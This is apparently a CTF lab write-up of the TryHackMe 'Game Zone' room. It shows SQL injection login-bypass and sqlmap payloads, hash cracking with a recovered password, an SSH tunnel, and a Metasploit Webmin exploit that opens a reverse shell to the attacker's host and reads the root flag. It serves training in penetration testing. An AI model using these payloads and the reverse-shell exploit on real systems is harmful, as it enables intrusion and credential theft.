---
title: "TryHackMe - Game Zone Writeup"
summary: "Writeup of Game Zone room on TryHackMe"
categories: ["writeup"]
tags: ["tryhackme", "sql", "ssh"]
showSummary: true
date: 2022-12-04
draft: false
---

## Introduction
This room will cover SQLi (exploiting this vulnerability manually and via SQLMap), cracking a users hashed password, using SSH tunnels to reveal a hidden service and using a metasploit payload to gain root privileges. 

Firstly, we run nmap to know what are open ports:
```bash
nmap -A 10.10.220.35
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-26 08:13 CEST
Nmap scan report for 10.10.220.35
Host is up (0.043s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
|   256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_  256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Game Zone
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.04 seconds
```

Then, we need to know the name of the cartoon avatar holding a sniper on the web server:
![ab43df9e62748f6ee13753414060039d.png](img/ab43df9e62748f6ee13753414060039d.png)

By reverse searching the picture on Google Lens, we found that is name is `Agent 47`:
![eaa11c52e1609f360e07bf92c15bb25a.png](img/eaa11c52e1609f360e07bf92c15bb25a.png)

## Obtain access via SQLi 
In this task you will understand more about SQL (structured query language) and how you can potentially manipulate queries to communicate with the database.

SQL is a standard language for storing, editing and retrieving data in databases. A query can look like so:

`SELECT * FROM users WHERE username = :username AND password := password`

In our GameZone machine, when you attempt to login, it will take your inputted values from your username and password, then insert them directly into the query above. If the query finds data, you'll be allowed to login otherwise it will display an error message.

Here is a potential place of vulnerability, as you can input your username as another SQL query. This will take the query write, place and execute it.

Lets use what we've learnt above, to manipulate the query and login without any legitimate credentials.

If we have our username as admin and our password as: `' or 1=1 -- -` it will insert this into the query and authenticate our session.

The SQL query that now gets executed on the web server is as follows:

`SELECT * FROM users WHERE username = admin AND password := ' or 1=1 -- -`

The extra SQL we inputted as our password has changed the above query to break the initial query and proceed (with the admin user) if `1==1`, then comment the rest of the query to stop it breaking.

GameZone doesn't have an admin user in the database, however you can still login without knowing any credentials using the inputted password data we used in the previous question.

Use `' or 1=1 -- -` as your username and leave the password blank.

By doing this, we've been redirected to the page `portal.php`.

## Using SQLMap 
We're going to use SQLMap to dump the entire database for GameZone.

Using the page we logged into earlier, we're going point SQLMap to the game review search feature.

First we need to intercept a request made to the search feature using BurpSuite.

![2189f72b1fa0eaad4dc9169e18f4019a.png](img/2189f72b1fa0eaad4dc9169e18f4019a.png)

Save this request into a text file. We can then pass this into SQLMap to use our authenticated user session.

```bash
sqlmap -r request.txt --dbms=mysql --dump
        ___
       __H__                                                                               
 ___ ___[,]_____ ___ ___  {1.6.8#stable}                                                   
|_ -| . ["]     | .'| . |                                                                  
|___|_  [)]_|_|_|__,|  _|                                                                  
      |_|V...       |_|   https://sqlmap.org                                               

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:42:32 /2022-10-26/

[08:42:32] [INFO] parsing HTTP request from 'request.txt'
[08:42:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchitem (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: searchitem=-3212' OR 1604=1604#

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchitem=test' AND GTID_SUBSET(CONCAT(0x717a717071,(SELECT (ELT(3420=3420,1))),0x71787a7671),3420)-- Quib

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchitem=test' AND (SELECT 5174 FROM (SELECT(SLEEP(5)))jdoK)-- blcK

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: searchitem=test' UNION ALL SELECT NULL,CONCAT(0x717a717071,0x58566a7371495a746e494f64484f5266755943747850466d7274434c4341425746626d4c53666658,0x71787a7671),NULL#
---
[08:42:32] [INFO] testing MySQL
[08:42:32] [INFO] confirming MySQL
[08:42:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.0
[08:42:32] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[08:42:32] [INFO] fetching current database
[08:42:32] [INFO] fetching tables for database: 'db'
[08:42:32] [INFO] fetching columns for table 'post' in database 'db'
[08:42:32] [INFO] fetching entries for table 'post' in database 'db'
Database: db
Table: post
[5 entries]
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | name                           | description                                                                                                                                                                                            |
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1  | Mortal Kombat 11               | Its a rare fighting game that hits just about every note as strongly as Mortal Kombat 11 does. Everything from its methodical and deep combat.                                                         |
| 2  | Marvel Ultimate Alliance 3     | Switch owners will find plenty of content to chew through, particularly with friends, and while it may be the gaming equivalent to a Hulk Smash, that isnt to say that it isnt a rollicking good time. |
| 3  | SWBF2 2005                     | Best game ever                                                                                                                                                                                         |
| 4  | Hitman 2                       | Hitman 2 doesnt add much of note to the structure of its predecessor and thus feels more like Hitman 1.5 than a full-blown sequel. But thats not a bad thing.                                          |
| 5  | Call of Duty: Modern Warfare 2 | When you look at the total package, Call of Duty: Modern Warfare 2 is hands-down one of the best first-person shooters out there, and a truly amazing offering across any system.                      |
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

[08:42:32] [INFO] table 'db.post' dumped to CSV file '/home/parallels/.local/share/sqlmap/output/10.10.220.35/dump/db/post.csv'                                                       
[08:42:32] [INFO] fetching columns for table 'users' in database 'db'
[08:42:32] [INFO] fetching entries for table 'users' in database 'db'
[08:42:32] [INFO] recognized possible password hashes in column 'pwd'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[08:42:37] [INFO] writing hashes to a temporary file '/tmp/sqlmapf2r7vilf89475/sqlmaphashes-ouhsfoc2.txt'                                                                             
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: db
Table: users
[1 entry]
+------------------------------------------------------------------+----------+
| pwd                                                              | username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47  |
+------------------------------------------------------------------+----------+

[08:42:39] [INFO] table 'db.users' dumped to CSV file '/home/parallels/.local/share/sqlmap/output/10.10.220.35/dump/db/users.csv'                                                     
[08:42:39] [INFO] fetched data logged to text files under '/home/parallels/.local/share/sqlmap/output/10.10.220.35'                                                                   

[*] ending @ 08:42:39 /2022-10-26/
```

## Cracking a password with JohnTheRipper 
```bash
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 128/128 ASIMD 4x])
Warning: poor OpenMP scalability for this hash type, consider --fork=2
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
videogamer124    (?)     
1g 0:00:00:00 DONE (2022-10-26 08:45) 3.703g/s 10922Kp/s 10922Kc/s 10922KC/s vimivi..vainlove
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed. 
```

Now we have a password and username. We can SSH'ing onto the machine.
```bash
ssh agent47@10.10.220.35
The authenticity of host '10.10.220.35 (10.10.220.35)' can't be established.
ED25519 key fingerprint is SHA256:CyJgMM67uFKDbNbKyUM0DexcI+LWun63SGLfBvqQcLA.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.220.35' (ED25519) to the list of known hosts.
agent47@10.10.220.35's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

109 packages can be updated.
68 updates are security updates.


Last login: Fri Aug 16 17:52:04 2019 from 192.168.1.147
agent47@gamezone:~$ 
```

## Exposing services with reverse SSH tunnels 
![47cf466511015262c274fa7892f46eeb.png](img/47cf466511015262c274fa7892f46eeb.png)

Reverse SSH port forwarding specifies that the given port on the remote server host is to be forwarded to the given host and port on the local side.

`-L` is a local tunnel (YOU <-- CLIENT). If a site was blocked, you can forward the traffic to a server you own and view it. For example, if imgur was blocked at work, you can do `ssh -L 9000:imgur.com:80 user@example.com`. Going to `localhost:9000` on your machine, will load imgur traffic using your other server.

`-R` is a remote tunnel (YOU --> CLIENT). You forward your traffic to the other server for others to view. Similar to the example above, but in reverse.



We will use a tool called `ss` to investigate sockets running on a host.

If we run `ss -tulpn` it will tell us what socket connections are running
| Argument	| Description |
| -------- | ----------- |
| -t	| Display TCP sockets |
| -u	| Display UDP sockets |
| -l	| Displays only listening sockets |
| -p	| Shows the process using the socket |
| -n	| Doesn't resolve service names |

We can see that a service running on port 10000 is blocked via a firewall rule from the outside (we can see this from the IPtable list). However, Using an SSH Tunnel we can expose the port to us (locally)!

From our local machine, run `ssh -L 10000:localhost:10000 <username>@<ip>`

Once complete, in your browser type `"localhost:10000"` and you can access the newly-exposed webserver.

Once we have accessed the webserver, we try to login withe credentials stolen before:
![81e6a818b4290abf3655897d11d9ff89.png](img/81e6a818b4290abf3655897d11d9ff89.png)

Then, we obtain the webmin version:
![29460f0a3155f2de1518400d1f0b7f53.png](img/29460f0a3155f2de1518400d1f0b7f53.png)

Finally, we search an exploit with the associated version:
```bash
searchsploit webmin 1.580
--------------------------------------------------------- ---------------------------------
 Exploit Title                                           |  Path
--------------------------------------------------------- ---------------------------------
Webmin 1.580 - '/file/show.cgi' Remote Command Execution | unix/remote/21851.rb
Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasp | linux/webapps/47330.rb
--------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

##  Privilege Escalation with Metasploit 
Firstly, we search for a metasploit module and use it:
```bash
msf6 > search webmin

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  exploit/unix/webapp/webmin_show_cgi_exec     2012-09-06       excellent  Yes    Webmin /file/show.cgi Remote Command Execution                                                  
   1  auxiliary/admin/webmin/file_disclosure       2006-06-30       normal     No     Webmin File Disclosure                                                                          
   2  exploit/linux/http/webmin_packageup_rce      2019-05-16       excellent  Yes    Webmin Package Updates Remote Command Execution                                                 
   3  exploit/unix/webapp/webmin_upload_exec       2019-01-17       excellent  Yes    Webmin Upload Authenticated RCE                                                                 
   4  auxiliary/admin/webmin/edit_html_fileaccess  2012-09-06       normal     No     Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access                             
   5  exploit/linux/http/webmin_backdoor           2019-08-10       excellent  Yes    Webmin password_change.cgi Backdoor                                                             


Interact with a module by name or index. For example info 5, use 5 or use exploit/linux/http/webmin_backdoor                                                                          

msf6 > use exploit/unix/webapp/webmin_show_cgi_exec 
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set RHOSTS localhost
RHOSTS => localhost
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set LHOST 10.11.5.152
LHOST => 10.11.5.152
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set USERNAME agent47
USERNAME => agent47
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set PASSWORD videogamer124
PASSWORD => videogamer124
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set SSL false
SSL => false
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > run
[*] Exploiting target 0.0.0.1

[*] Started reverse TCP double handler on 10.11.5.152:4444 
[*] Attempting to login...
[-] Authentication failed
[*] Exploiting target 127.0.0.1
[*] Started reverse TCP double handler on 10.11.5.152:4444 
[*] Attempting to login...
[+] Authentication successful
[+] Authentication successful
[*] Attempting to execute the payload...
[+] Payload executed successfully
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo rpguSGxv6AIg0nBw;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "rpguSGxv6AIg0nBw\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.11.5.152:4444 -> 10.10.220.35:58628) at 2022-10-26 09:26:20 +0200
[*] Session 1 created in the background.
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > sessions -l

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               10.11.5.152:4444 -> 10.10.220.35:58628 (127.0.0.
                                         1)

msf6 exploit(unix/webapp/webmin_show_cgi_exec) >
```

Now that we have a shell, we'll go into it:
```bash
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > sessions -i 1
[*] Starting interaction with 1...


Shell Banner:
lLUDHKp0t8GjcQ9W
-----
          

find / -name "root.txt"
/root/root.txt

cd /root
cat root.txt
a4b945830144bdd71908d12d902adeee
```
